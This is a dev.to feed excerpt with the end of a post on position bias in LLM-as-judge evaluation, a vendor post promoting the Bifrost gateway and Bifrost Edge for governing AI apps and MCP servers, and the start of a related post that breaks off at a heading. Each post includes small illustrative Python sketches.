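&lt;p&gt;For reference, unweighted Cohen's kappa is the observed agreement corrected for the agreement you would expect by chance from each pass's label frequencies. The sketch below is a plain-Python version for two lists of verdicts that have already been normalized to the same framing (for example &lt;code&gt;"cand"&lt;/code&gt;, &lt;code&gt;"base"&lt;/code&gt;, &lt;code&gt;"tie"&lt;/code&gt;); the function name is hypothetical, and scikit-learn's &lt;code&gt;cohen_kappa_score&lt;/code&gt; computes the same statistic.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;from collections import Counter

def cohen_kappa(pass_1, pass_2):
    """Unweighted Cohen's kappa for two equal-length lists of verdicts."""
    if len(pass_1) != len(pass_2) or not pass_1:
        raise ValueError("need two non-empty lists of equal length")
    n = len(pass_1)
    # Fraction of pairs where the two passes gave the same verdict.
    observed = sum(a == b for a, b in zip(pass_1, pass_2)) / n
    counts_1, counts_2 = Counter(pass_1), Counter(pass_2)
    # Agreement expected by chance from each pass's label frequencies.
    expected = sum(counts_1[label] * counts_2[label] for label in counts_1) / (n * n)
    if expected == 1.0:
        # Both passes used one identical label; kappa is undefined here,
        # and this sketch chooses to report perfect agreement.
        return 1.0
    return (observed - expected) / (1.0 - expected)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Raw agreement alone can look high when one verdict dominates; kappa discounts that, which is why it makes a better alarm threshold.&lt;/p&gt;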

&lt;h2&gt;
  
  
  Trade-offs and limitations
&lt;/h2&gt;

&lt;p&gt;Dual-pass doubles judge token cost, which on 1,200 pairs at our prompt sizes added a few dollars per eval run. That is fine for release gates and unacceptable for per-request online scoring, so we only run it offline.&lt;/p&gt;

&lt;p&gt;Gating on agreement inflates the tie count. Roughly a fifth of our previously decisive verdicts became ties, which makes small model improvements harder to detect. That is the correct outcome, not a bug: if a difference does not survive an order swap, calling it a win was the original mistake.&lt;/p&gt;

&lt;p&gt;None of this addresses other judge biases. Length bias, self-preference when a model judges its own outputs, and sensitivity to formatting all persist. Position bias is the easiest one to measure, so it is the right place to start, not the place to stop.&lt;/p&gt;

&lt;h2&gt;
  
  
  Where to go next
&lt;/h2&gt;

&lt;p&gt;If you run any LLM-as-judge pipeline, measure your flip rate before you touch anything else. It takes one extra pass over an existing comparison set and tells you whether your leaderboard reflects model quality or prompt ordering. I would run the swap test on your next eval, log Cohen's kappa between passes, and only then argue about which model won.&lt;/p&gt;

&lt;h2&gt;
  
  
  Further reading
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://arxiv.org/abs/2305.17926" rel="noopener noreferrer"&gt;Large Language Models are not Fair Evaluators&lt;/a&gt;: the paper that quantified position bias in pairwise judging.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://arxiv.org/abs/2306.05685" rel="noopener noreferrer"&gt;Judging LLM-as-a-Judge with MT-Bench and Chatbot Arena&lt;/a&gt;: position swapping and agreement analysis.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://arxiv.org/abs/2303.16634" rel="noopener noreferrer"&gt;G-Eval: NLG Evaluation using GPT-4 with Better Human Alignment&lt;/a&gt;: reference-anchored scoring as an alternative to pairwise.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://scikit-learn.org/stable/modules/generated/sklearn.metrics.cohen_kappa_score.html" rel="noopener noreferrer"&gt;scikit-learn Cohen's kappa&lt;/a&gt;: inter-pass agreement scoring.&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>machinelearning</category>
      <category>llm</category>
      <category>mlops</category>
      <category>aiengineering</category>
    </item>
    <item>
      <title>Governing AI Apps and the MCP Servers They Connect To From One Dashboard</title>
      <dc:creator>Marcus Chen</dc:creator>
      <pubDate>Wed, 24 Jun 2026 18:30:06 +0000</pubDate>
      <link>https://dev.to/marcuswwchen/governing-ai-apps-and-the-mcp-servers-they-connect-to-from-one-dashboard-32nh</link>
      <guid>https://dev.to/marcuswwchen/governing-ai-apps-and-the-mcp-servers-they-connect-to-from-one-dashboard-32nh</guid>
      <description>&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fn15eul1k24oc4l2rs2fx.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fn15eul1k24oc4l2rs2fx.png" alt="Governing AI Apps and the MCP Servers They Connect To From One Dashboard" width="800" height="457"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;As AI adoption surges, organizations face challenges governing the proliferation of AI apps and the unmanaged MCP servers employees use. Learn how to centralize AI governance with &lt;a href="https://www.getmaxim.ai/bifrost" rel="noopener noreferrer"&gt;Bifrost&lt;/a&gt; and &lt;a href="https://www.getmaxim.ai/bifrost/edge" rel="noopener noreferrer"&gt;Bifrost Edge&lt;/a&gt; for comprehensive control and visibility.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;The rapid adoption of AI across enterprises has brought unprecedented efficiency, but it also introduces complex governance challenges. Employees routinely use AI tools and connect to Model Context Protocol (MCP) servers without formal oversight, creating "shadow AI" and significant security and compliance risks. Addressing this requires a unified approach that brings both AI application usage and the underlying MCP server interactions under a single pane of glass. &lt;a href="https://www.getmaxim.ai/bifrost" rel="noopener noreferrer"&gt;Bifrost&lt;/a&gt;, an &lt;a href="https://github.com/maximhq/bifrost" rel="noopener noreferrer"&gt;open-source AI gateway&lt;/a&gt; from Maxim AI, provides the core control plane, which is then extended to every endpoint by Bifrost Edge for comprehensive governance.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Rise of Shadow AI and Ungoverned Endpoints
&lt;/h2&gt;

&lt;p&gt;The proliferation of generative AI tools means employees are increasingly using AI in their daily workflows, often without IT approval. Approximately 67% of employees use AI tools at work, yet only 18% of organizations have formal AI security policies in place. This disparity creates a significant "shadow AI" problem, where sensitive data, including personally identifiable information (PII) and intellectual property, can be exposed. PII is exposed in about 65% of shadow AI-related incidents, while intellectual property is exposed in around 40% of incidents.&lt;/p&gt;

&lt;p&gt;Beyond consumer-grade AI chat apps, the Model Context Protocol (MCP) allows AI agents to connect to external tools like databases, APIs, and internal systems, enabling powerful autonomous actions. While beneficial for productivity, ungoverned MCP server usage introduces critical security risks. These include sensitive data exfiltration, unauthorized actions from compromised tool responses, overprivileged agent access, and a lack of audit trails connecting agent actions to human accountability. Many organizations lack comprehensive visibility into how employees use AI, with some reports indicating only 25% have such insight.&lt;/p&gt;

&lt;h2&gt;
  
  
  Centralized AI Governance with the AI Gateway
&lt;/h2&gt;

&lt;p&gt;An AI gateway functions as a centralized control plane for all AI traffic between applications and LLM providers. It intercepts every request and response, enforcing policies, routing decisions, authentication, and compliance controls. Bifrost, as an AI gateway, offers a robust set of features to establish this central governance:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Virtual Keys:&lt;/strong&gt; These serve as the primary governance entity, allowing administrators to set per-consumer access permissions, budgets, and rate limits for AI usage.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Routing and Failover:&lt;/strong&gt; Intelligent routing directs requests to specific models, providers, and keys, ensuring automatic failover in case of provider outages and optimizing performance and cost.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Guardrails:&lt;/strong&gt; Content safety guardrails can be configured to catch sensitive information like secrets or PII before it leaves the organization's network, supporting compliance standards like SOC 2, GDPR, HIPAA, and ISO 27001.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Audit Logs:&lt;/strong&gt; Immutable audit logs provide a clear record of all AI interactions, which is crucial for accountability and regulatory compliance.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;These controls are configured centrally within the Bifrost AI gateway, establishing a foundational layer of security and policy enforcement for traffic explicitly routed through it.&lt;/p&gt;

&lt;h2&gt;
  
  
  Extending Governance to Every Machine with Bifrost Edge
&lt;/h2&gt;

&lt;p&gt;While the AI gateway provides robust control for configured traffic, shadow AI persists because many endpoint applications and MCP servers bypass the gateway entirely. This is where &lt;a href="https://www.getmaxim.ai/bifrost/edge" rel="noopener noreferrer"&gt;Bifrost Edge&lt;/a&gt; extends the gateway's governance to every machine in the organization. Bifrost Edge is a lightweight agent that runs on employee macOS, Windows, and Linux devices, routing all AI traffic through the organization's Bifrost AI gateway. This ensures that the same virtual keys, budgets, guardrails, and audit logs configured in the gateway apply to all AI traffic originating from endpoints, regardless of the application used.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F9g9zda7s1sjnej1w5tv7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F9g9zda7s1sjnej1w5tv7.png" alt="A network of glowing lines extending from a central secure hub outward to various endpoint devices like laptops and tabl" width="800" height="457"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Bifrost Edge addresses the core challenge of shadow AI by making endpoint AI usage observable and enforceable from a single dashboard, without requiring users to reconfigure individual applications.&lt;/p&gt;

&lt;h3&gt;
  
  
  Governing AI Applications at the Endpoint
&lt;/h3&gt;

&lt;p&gt;Bifrost Edge gives administrators granular control over which AI applications are permitted within the organization. Teams can define policies to allow or block specific AI tools, and Edge enforces these decisions directly on each device. When Edge detects a new, unapproved application, it can trigger an approval workflow in the admin console, enabling security teams to review and either approve or deny its use across the fleet. This ensures that only sanctioned applications, fully governed by Bifrost's policies, can operate on company machines. When an application is blocked, users receive clear notifications, preventing potential data exfiltration or policy violations.&lt;/p&gt;

&lt;h3&gt;
  
  
  Gaining Visibility and Control Over MCP Servers
&lt;/h3&gt;

&lt;p&gt;A significant blind spot for many organizations is the unmanaged proliferation of MCP servers that AI agents connect to. Edge closes this gap by providing a live, fleet-wide inventory of all MCP servers configured within AI applications on endpoint devices. Administrators can see which external tools are in use, by whom, and on how many machines.&lt;/p&gt;

&lt;p&gt;Once identified, administrators can make per-server allow or deny decisions. A denied MCP server cannot be used, even if an application previously had it configured. This active enforcement prevents agents from connecting to potentially malicious or unvetted external tools, mitigating risks like supply chain exposure and unauthorized command execution. Edge supports discovery for leading AI applications such as Claude Code, Claude Desktop, Gemini CLI, OpenCode, Codex, and Cursor.&lt;/p&gt;
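&lt;p&gt;The deny-overrides-local-configuration rule described above can be sketched in a few lines. This is a minimal illustration, not Bifrost Edge's implementation: the &lt;code&gt;McpServer&lt;/code&gt; type, the &lt;code&gt;usable_servers&lt;/code&gt; function, the status strings, and the example endpoints are all hypothetical names chosen for the sketch.&lt;/p&gt;

```python
from dataclasses import dataclass

# Hypothetical status values for this sketch.
APPROVED = "approved"
DENIED = "denied"
PENDING = "pending"


@dataclass(frozen=True)
class McpServer:
    name: str
    endpoint: str


def usable_servers(configured, decisions, allow_pending=False):
    """Return the locally configured servers that central policy permits."""
    permitted = []
    for server in configured:
        # Servers with no recorded decision are treated as pending review.
        status = decisions.get(server.endpoint, PENDING)
        if status == APPROVED or (status == PENDING and allow_pending):
            permitted.append(server)
    return permitted


# Local application config lists two servers; central policy denies one.
configured = [
    McpServer("filesystem", "stdio://fs-server"),
    McpServer("unknown-tool", "https://mcp.example.invalid/sse"),
]
decisions = {
    "stdio://fs-server": APPROVED,
    "https://mcp.example.invalid/sse": DENIED,
}
print([s.name for s in usable_servers(configured, decisions)])  # ['filesystem']
```

&lt;p&gt;The point of the sketch is that the central decision table, not the application's local configuration, has the final say: a server that is still configured locally is simply filtered out once it is denied.&lt;/p&gt;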

&lt;h3&gt;
  
  
  Enforcing Security and Guardrails Everywhere
&lt;/h3&gt;

&lt;p&gt;With Bifrost Edge, the robust security guardrails configured in the Bifrost AI gateway automatically apply to endpoint AI traffic. This means that prompts and responses from desktop apps, browser AI, and coding agents are protected by the same rules that secure gateway traffic. Guardrails can detect and prevent the leakage of sensitive content, such as secrets or PII, before it leaves the machine.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F4nu2hlnr0hj7x9sfhz2h.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F4nu2hlnr0hj7x9sfhz2h.png" alt="A digital shield icon overlaying a stream of data representing prompts and responses, with a smaller warning icon indica" width="800" height="457"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;These guardrails include native secrets detection (backed by Gitleaks), custom regex patterns for organization-specific redaction, and integrations with third-party solutions like AWS Bedrock Guardrails, Azure Content Safety, and Patronus AI. This comprehensive approach ensures that security policies are consistently applied across all AI interactions, from the data center to the user's laptop.&lt;/p&gt;
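&lt;p&gt;To make the custom-regex idea concrete, here is a minimal sketch of pattern-based redaction using Python's standard &lt;code&gt;re&lt;/code&gt; module. It does not use Bifrost's configuration format; the pattern names, the &lt;code&gt;EMP-&lt;/code&gt; employee ID scheme, and the &lt;code&gt;redact&lt;/code&gt; helper are assumptions made for illustration, and real patterns would need tuning against an organization's own data.&lt;/p&gt;

```python
import re

# Hypothetical organization-specific patterns, for illustration only.
PATTERNS = {
    "email": re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}"),
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "employee_id": re.compile(r"\bEMP-\d{6}\b"),
}


def redact(text):
    """Replace each match with a labeled placeholder and report what was found."""
    findings = []
    for label, pattern in PATTERNS.items():
        text, count = pattern.subn(f"[REDACTED:{label}]", text)
        if count:
            findings.append((label, count))
    return text, findings


prompt = "Contact jane.doe@example.com about EMP-004217 using AKIAABCDEFGHIJKLMNOP."
clean, findings = redact(prompt)
print(clean)
print(findings)
```

&lt;p&gt;Returning the findings alongside the redacted text lets the caller decide whether to forward the cleaned prompt, block the request outright, or only log the event.&lt;/p&gt;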

&lt;h2&gt;
  
  
  Streamlined Deployment and Administration
&lt;/h2&gt;

&lt;p&gt;Bifrost Edge is designed for enterprise-scale deployment. Instead of manual installation on individual machines, organizations can push the Edge agent to every device through existing Mobile Device Management (MDM) platforms. Supported MDM solutions include Jamf, Microsoft Intune, Kandji, Omnissa Workspace ONE, and JumpCloud, covering macOS, Windows, and Linux endpoints.&lt;/p&gt;

&lt;p&gt;A managed configuration ensures that devices are pre-pointed at the organization's Bifrost instance upon installation, simplifying rollout. After deployment, administrators manage the entire fleet from a central dashboard. This dashboard provides:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Devices Dashboard:&lt;/strong&gt; A summary of all machines running Edge, including details like hostname, owner, OS, and installed AI apps/MCP servers.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Approvals Dashboard:&lt;/strong&gt; A deduplicated catalog of discovered AI apps and MCP servers, allowing for fleet-wide approval or denial with clear status (Pending, Approved, Denied).&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Configurations:&lt;/strong&gt; Centralized settings like the organization certificate (required for routing encrypted AI traffic) and policy sync intervals.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This consolidated view transforms shadow AI from an unmanaged risk into observable and enforceable traffic, enhancing overall security posture and compliance.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Combined Power: AI Gateway + Bifrost Edge
&lt;/h2&gt;

&lt;p&gt;Effective enterprise AI governance needs a unified strategy. The Bifrost AI gateway serves as the control plane, where virtual keys, budgets, guardrails, and audit logs are defined. Bifrost Edge extends the same governance to the endpoint, so that AI apps and the MCP servers they connect to on every employee's machine are subject to organizational policies. Together they bring shadow AI into view and give teams a single, consistent framework for visibility, security, and compliance across AI traffic, from the data center to the edge device.&lt;/p&gt;

&lt;h2&gt;
  
  
  Sources
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;a href="https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQE7rUfsquHANIB835eMMTOZ8gw64SMmNE023ohtHWvXxPMF2ndmLtJFiCOknzewt_BNvBmDDGRRjtPk9Jf80iQts1bmO9q5FMt66Sedz88AoMyZjdcwFxBSCX2AHezLhQA5nQl3vxGTDqK-8K3gSin83Vhub3E8zNbUX9m4K-ro" rel="noopener noreferrer"&gt;20 Shadow AI Statistics 2024–2026: Enterprise AI Risks Companies Cannot Ignore&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;  &lt;a href="https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHS1AbnbtU2nD4uq8Iw5FtctEck7kJ13u9JzCrfA7E70xc7q2yayLICNXIm6razWNiFuCYoA5iByg0Hz6FMI-mgIILicyHdYtLZydHT_5xqEBXvhs0blGTpQFWcLyUUNA==" rel="noopener noreferrer"&gt;Shadow AI stats for 2026: The hidden adoption gap defining enterprise risk - Optro&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;  &lt;a href="https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQEUbKbts5Dl_mRMPZLjBnaSJYnxpDG8Xk-bdi6l3T3z-IlDMhZ-63T8AuUNvFCPyzeofTi6LaF33pPWJSfooxKiVQC1TAwE7dvDhnLm3ti7TtH_se9E_C2lwpp1gdJV4BuV6HhIDfQ==" rel="noopener noreferrer"&gt;7 MCP Server Security Risks for Enterprises - Witness AI&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;  &lt;a href="https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFm6c_srAjwuxVCjVJbxXRzRWGWhRmL4rzUy90oAG0fR9sDW-bNzNKap8UHpgSEVVoV-hJ7BrH5UdG_ojcxFliM07cgMdwuJllu3NmTerMXpK-LnmyQ5_ftHLV_-tCpTq6PBt4Ahz4sNSh2cKyQbRg8pQe8" rel="noopener noreferrer"&gt;Top MCP Security Risks &amp;amp; 10 Critical Best Practices - CyCognito&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;  &lt;a href="https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGsIPRyB3Gfl3TW6qSAVMURVdunUJu7spAC5UCk-0zsZOa521-wBqOayDwV1LA5nhDklJSrw-7oW23RMSx5YrjJy2hbfzyzrbOFuNilX-hpK-E2vSD87NoVh5gsr705Zu8VjsqY2kj6GzgTH_iN6Wphf9TGJveT9Xx-N6e1U0_jzuaS-OUfylJIvy0=" rel="noopener noreferrer"&gt;What is an AI Gateway? Enterprise-Grade Governance &amp;amp; API Control - PromptHalo&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;  &lt;a href="https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQH7WvxfH-OTrjjW-s4nRd_Rht_BF8_umTwTKPan0zmtG4Z1kzxicCkTAoGtRspRO_-ierBfuCM97-V_hnpg3DJ1vP-6GY5piV1KxpUcppYCpiymkpguEko_VosifwGGVNTWofdm_27gj3cA3fSLiHaVFgHlIVnWv-wwk-m8fAEEXDGzKv6mnLymE01CifkS" rel="noopener noreferrer"&gt;Roll Out AI Governance With MDM: Jamf, Intune, Kandji - Maxim AI&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;  &lt;a href="https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQH_sJMYp5tpflEDQeCfp4zqsUhrcXGPBCHO1MidIsqfmFYCMG70QZbMQ17ereY3zxjslkuyMq-h7EHdIDRmiMHQxuQ-dC2JWdzLf2vyUz1acIoD7WIcIzx8EpGffdofCwdamnZkA9AT2l-2AB12H8p9C-tIRRv5oRHOCZBp8N5rfUpXuYFLu-lBmVd3F_k5zbSiA1JkznbLNMup69Pen8K_" rel="noopener noreferrer"&gt;Bifrost Edge: MCP Visibility and Control for Enterprise Teams and Beyond - Maxim AI&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;  &lt;a href="https://github.com/maximhq/bifrost" rel="noopener noreferrer"&gt;Bifrost GitHub Repository&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;  &lt;a href="https://www.getmaxim.ai/bifrost" rel="noopener noreferrer"&gt;Bifrost Product Page&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;  &lt;a href="https://www.getmaxim.ai/bifrost/edge" rel="noopener noreferrer"&gt;Bifrost Edge Product Page&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>aigovernance</category>
      <category>shadowai</category>
      <category>mcpservers</category>
      <category>endpointsecurity</category>
    </item>
    <item>
      <title>When Developers Connect Random MCP Servers: How to Regain Control</title>
      <dc:creator>Marcus Chen</dc:creator>
      <pubDate>Wed, 24 Jun 2026 18:29:46 +0000</pubDate>
      <link>https://dev.to/marcuswwchen/when-developers-connect-random-mcp-servers-how-to-regain-control-4cch</link>
      <guid>https://dev.to/marcuswwchen/when-developers-connect-random-mcp-servers-how-to-regain-control-4cch</guid>
      <description>&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Flugnxcoocqjs38prb8dg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Flugnxcoocqjs38prb8dg.png" alt="When Developers Connect Random MCP Servers: How to Regain Control" width="800" height="457"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Developers frequently connect AI agents and tools to Model Context Protocol (MCP) servers to extend their capabilities. This article examines the security and governance challenges posed by ungoverned MCP server usage and outlines how an &lt;a href="https://www.getmaxim.ai/bifrost" rel="noopener noreferrer"&gt;AI gateway&lt;/a&gt; combined with endpoint AI governance can help organizations regain control.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;AI agents and developer tools increasingly rely on Model Context Protocol (MCP) servers to enhance their functionality, allowing them to interact with external systems, read files, or execute code. While this capability empowers developers, the proliferation of unmanaged MCP server connections across an organization can introduce significant security and compliance risks. Without a clear governance framework, these connections can become a blind spot, leading to "shadow AI" where sensitive company data might be inadvertently exposed or misused.&lt;/p&gt;

&lt;h2&gt;
  
  
  Understanding the Shadow AI Challenge with Ungoverned MCP Servers
&lt;/h2&gt;

&lt;p&gt;The ease with which developers can configure AI tools and agents to connect to various MCP servers presents a double-edged sword. On one hand, it fosters innovation and productivity. On the other, it creates an environment where IT and security teams lose visibility into critical data flows and potential vulnerabilities.&lt;/p&gt;

&lt;p&gt;When developers connect random MCP servers to their AI assistants, the consequences can include:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Data Leakage:&lt;/strong&gt; Sensitive intellectual property, customer data, or internal documents could be processed by an unapproved MCP server, potentially transmitted to external services without encryption, or stored insecurely.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Compliance Violations:&lt;/strong&gt; Regulations such as GDPR and HIPAA, and audit frameworks such as SOC 2, require strict control over data handling. Ungoverned MCP servers can bypass these controls, leading to non-compliance and, under the regulations, potential fines.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Security Risks:&lt;/strong&gt; Malicious MCP servers could introduce vulnerabilities, act as an exfiltration vector for data, or execute unauthorized actions within the company's network.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Lack of Auditability:&lt;/strong&gt; Without centralized logging and control, there is no way to track which data was sent to which MCP server, who accessed it, or how it was used. This absence of an audit trail makes incident response and forensic analysis nearly impossible.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;These challenges highlight the critical need for a robust strategy to govern AI traffic, particularly at the endpoint where developers are actively interacting with AI tools. The rise of shadow IT, now manifesting as shadow AI, necessitates a comprehensive approach to visibility and control.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fhz3ftes21jzqw7w4olui.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fhz3ftes21jzqw7w4olui.png" alt="A dark, intricate web representing 'shadow AI,' with hidden connections and data flowing unchecked into unknown destinat" width="800" height="457"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  The Bifrost Approach: Centralized AI Governance at Scale
&lt;/h2&gt;

&lt;p&gt;Organizations can begin to address this challenge by routing all AI traffic through a dedicated AI gateway. &lt;a href="https://www.getmaxim.ai/bifrost" rel="noopener noreferrer"&gt;Bifrost&lt;/a&gt;, an &lt;a href="https://github.com/maximhq/bifrost" rel="noopener noreferrer"&gt;open-source AI gateway&lt;/a&gt; from Maxim AI, provides a centralized control plane for managing interactions with LLM providers and the MCP ecosystem.&lt;/p&gt;

&lt;p&gt;At the gateway layer, Bifrost enables robust governance through features such as:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Virtual Keys:&lt;/strong&gt; These serve as primary governance entities, allowing administrators to define specific access permissions, budgets, and rate limits for different projects, teams, or individual users. This ensures that even approved MCP interactions operate within defined constraints.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Guardrails:&lt;/strong&gt; Bifrost offers comprehensive guardrails to detect and prevent sensitive data from leaving the organization. This includes native secrets detection, custom regex patterns for PII, and integrations with third-party content safety solutions like AWS Bedrock Guardrails or Azure Content Safety. These guardrails apply to all traffic passing through the gateway.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Audit Logs:&lt;/strong&gt; Every interaction routed through Bifrost generates immutable audit logs, providing a complete historical record of prompts, responses, token usage, and policy enforcement actions. This is crucial for compliance reporting and incident investigation.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;MCP Tool Filtering:&lt;/strong&gt; Administrators can define which MCP tools are accessible per virtual key, ensuring that only approved tools can be invoked by agents connecting through the gateway.&lt;/li&gt;
&lt;/ul&gt;
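&lt;p&gt;As a rough illustration of per-virtual-key tool filtering, the sketch below checks requested MCP tool names against an allow-list keyed by virtual key. The key names, tool names, and the &lt;code&gt;filter_tools&lt;/code&gt; function are hypothetical and do not reflect Bifrost's actual configuration schema.&lt;/p&gt;

```python
# Hypothetical policy table: virtual key name -> set of permitted MCP tool names.
TOOL_POLICY = {
    "vk-platform-team": {"read_file", "run_tests"},
    "vk-support-bot": {"search_docs"},
}


def filter_tools(virtual_key, requested_tools):
    """Split requested tools into allowed and blocked lists for one virtual key."""
    permitted = TOOL_POLICY.get(virtual_key, set())  # unknown keys get no tools
    allowed = [t for t in requested_tools if t in permitted]
    blocked = [t for t in requested_tools if t not in permitted]
    return allowed, blocked


allowed, blocked = filter_tools("vk-platform-team", ["read_file", "delete_repo"])
print(allowed, blocked)  # ['read_file'] ['delete_repo']
```

&lt;p&gt;Defaulting unknown keys to an empty set keeps the sketch deny-by-default, which matches the intent that only approved tools can be invoked.&lt;/p&gt;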

&lt;p&gt;While these gateway-level controls are powerful, they only govern traffic that is explicitly configured to flow through Bifrost. The core problem of developers connecting &lt;em&gt;random&lt;/em&gt; MCP servers often occurs outside this explicit routing.&lt;/p&gt;

&lt;h2&gt;
  
  
  Extending Control to the Endpoint with Bifrost Edge
&lt;/h2&gt;

&lt;p&gt;To truly regain control over ungoverned MCP server usage and mitigate shadow AI risks, organizations need to extend their governance policies to the devices where AI tools are actually used. This is where &lt;strong&gt;Bifrost Edge&lt;/strong&gt; plays a critical role, complementing the AI gateway by bringing endpoint AI traffic under the same centralized governance.&lt;/p&gt;

&lt;p&gt;Bifrost Edge is an endpoint agent that runs natively on macOS, Windows, and Linux machines. It routes all AI traffic from supported applications—including desktop chat apps, AI in the browser, and coding agents—through the organization's Bifrost AI gateway. This ensures that the same virtual keys, budgets, guardrails, and audit logs configured in Bifrost are enforced on every endpoint.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Ffdbwqwz6mbh6fg53fs61.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Ffdbwqwz6mbh6fg53fs61.png" alt="A multi-layered illustration showing a protective shield around a laptop, with visible data streams from the device bein" width="800" height="457"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
